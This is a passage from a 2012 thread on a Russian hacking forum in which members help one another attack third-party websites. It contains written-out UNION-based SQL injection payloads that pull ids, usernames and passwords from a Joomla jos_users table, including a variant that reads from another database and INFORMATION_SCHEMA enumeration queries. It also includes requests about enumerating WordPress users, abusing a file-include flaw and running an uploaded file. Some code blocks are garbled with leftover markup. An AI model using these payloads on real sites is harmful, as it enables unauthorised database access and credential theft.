HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #20581  
Старый 04.05.2012, 21:45
Compton
Участник форума
Регистрация: 31.01.2010
Сообщений: 170
Провел на форуме:
1442841

Репутация: 63
Отправить сообщение для Compton с помощью AIM Отправить сообщение для Compton с помощью Yahoo
По умолчанию

Цитата:
Сообщение от Cock3r  
Cock3r said:
как получить список пользователей wordpress?без админки
если есть скуль,то раскручивать ее до инфы с таблицы wp_users
 
Ответить с цитированием

  #20582  
Старый 04.05.2012, 21:48
Cock3r
Guest
Сообщений: n/a
Провел на форуме:
3318

Репутация: 0
По умолчанию

Цитата:
Сообщение от Compton  
Compton said:
если есть скуль,то раскручивать ее до инфы с таблицы wp_users
а если нету?
 
Ответить с цитированием

  #20583  
Старый 04.05.2012, 22:47
cat1vo
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937

Репутация: 0
По умолчанию

Вы хотите без уязвимости сделать дамп БД? Извините, Вы не маг случайно?
 
Ответить с цитированием

  #20584  
Старый 05.05.2012, 03:25
Pirotexnik
Guest
Сообщений: n/a
Провел на форуме:
97332

Репутация: 38
По умолчанию

Есть инклуд, есть ава, есть ошибка, по которой виден путь.

Но ава почему-то не инклудится, хотя другие картинки инклудятся. Все вроде на 1-м сервере.

Это Mod rewrite шалит?

Как понять что за фигня?
 
Ответить с цитированием

  #20585  
Старый 05.05.2012, 10:57
trololoman96
Guest
Сообщений: n/a
Провел на форуме:
29020

Репутация: 55
По умолчанию

Цитата:
Сообщение от None  
Это Mod rewrite шалит?
мод реврайт не действует для инклудов

Цитата:
Сообщение от None  
Но ава почему-то не инклудится, хотя другие картинки инклудятся. Все вроде на 1-м сервере.
ну вот наверное не на 1 сервере, или что то не правильно делаешь, чтобы наверняка найди настройки апача и посмотри есть ли там такой хост

Цитата:
Сообщение от None  
Как понять что за фигня?
если сам не можешь, выложи, что гадать то, мож и поможет кто
 
Ответить с цитированием

  #20586  
Старый 05.05.2012, 11:18
Muracha
Guest
Сообщений: n/a
Провел на форуме:
54593

Репутация: 0
По умолчанию

Раскручиваю sql- иньекцию.

Наугад нашел таблицу games.

Запрос вида:

Цитата:
Сообщение от None  
game.php?gameid=-1+union+select+1,2,3,4,5,6,7,8+FROM+games--
работает.

Запрос типа:

Цитата:
Сообщение от None  
game.php?gameid=-1+union+select+1,2,3,4,5,6,7,8+FROM+jos_users--
не работает.

Хотя таблицу games в БД я найти не могу. А таблицу jos_users - могу найти. но вывести данные не получается.

Цитата:
Сообщение от None  
game.php?gameid=-1+union+select+1,UNHEX(HEX(COLUMN_NAME)),3,4,5,6,7 ,8+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAM E=0x6a6f735f7573657273+LIMIT+2,1%20--
- срабатывает.

Подозреваю на фильтрацию или некорректную кодировку в базе данных.

Вопрос, как можно будет зафильтровать jos_users, чтобы можно было делать запросы и выводить данные из логина-паролей типа:

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]game[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#0000BB"]gameid[/COLOR][COLOR="#007700"]=-[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]union[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]select[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]concat_ws[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]0x03a[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]username[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]password[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]5[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]6[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]7[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]8[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]FROM[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]jos_users[/COLOR][COLOR="#007700"]--[/COLOR][/COLOR
 
Ответить с цитированием

  #20587  
Старый 05.05.2012, 11:27
trololoman96
Guest
Сообщений: n/a
Провел на форуме:
29020

Репутация: 55
По умолчанию

А я подозреваю что таблица в другой бд
 
Ответить с цитированием

  #20588  
Старый 05.05.2012, 12:12
Muracha
Guest
Сообщений: n/a
Провел на форуме:
54593

Репутация: 0
По умолчанию

Если в таком случае - как правильно создать запрос для вывода данных из другой базы данных?
 
Ответить с цитированием

  #20589  
Старый 05.05.2012, 13:37
cat1vo
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937

Репутация: 0
По умолчанию

to Muracha

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]game[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#0000BB"]gameid[/COLOR][COLOR="#007700"]=-[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]union[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]select[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]concat_ws[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]0x03a[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]username[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]password[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]5[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]6[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]7[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]8[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]FROM[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]anotherdb[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]jos_users[/COLOR][COLOR="#007700"]--[/COLOR][/COLOR
Для вывода таблиц из другой базы данных

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]select table_name from information_schema[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]tables where table_schema[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'anotherdb'[/COLOR][COLOR="#0000BB"]limit 0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"];[/COLOR][/COLOR
Так же делаем с колонками

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]select column_name from information_schema[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]columns where table_name[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'jos_users'[/COLOR][COLOR="#007700"]and[/COLOR][COLOR="#0000BB"]table_schema[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'anotherdb'[/COLOR][COLOR="#0000BB"]limit 0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"];[/COLOR][/COLOR
 
Ответить с цитированием

  #20590  
Старый 05.05.2012, 16:49
skier529
Новичок
Регистрация: 08.05.2009
Сообщений: 8
Провел на форуме:
49568

Репутация: 1
По умолчанию

Не знаю туда или нет, но все-таки спрошу:

Есть доступ к админке, там есть возможность заливки pdf файла. В итоге файл получает ссылку вида http://shell.com/download.php?id=418.

В БД никаких упоминай о файле... По крайней мере в данных к которым у меня есть доступ.

Вопрос в том как этот файл запустить.

P.S По этой ссылке выдает ошибку "Не удалось загрузить документ PDF.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ